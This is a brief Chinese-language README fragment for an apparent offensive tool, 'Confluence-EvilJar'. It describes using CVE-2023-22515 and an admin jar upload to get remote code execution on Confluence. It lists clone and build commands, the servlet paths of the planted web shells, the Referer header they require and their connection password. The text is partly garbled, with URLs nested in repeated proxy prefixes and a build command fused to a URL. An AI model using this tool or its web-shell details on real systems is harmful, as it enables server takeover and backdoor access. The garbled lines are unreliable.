配合 CVE-2023-22515 后台上传jar包实现RCE
git clone https://github.com/aaaademo/Confluence-EvilJar
cd Confluence-EvilJar
mvn packagehttp://confluence.local/plugins/servlet/testbin/cmServlet
http://confluence.local/plugins/servlet/testbin/gzServlet
Referer: https://www.baidu.com/
p@ssw0rd / key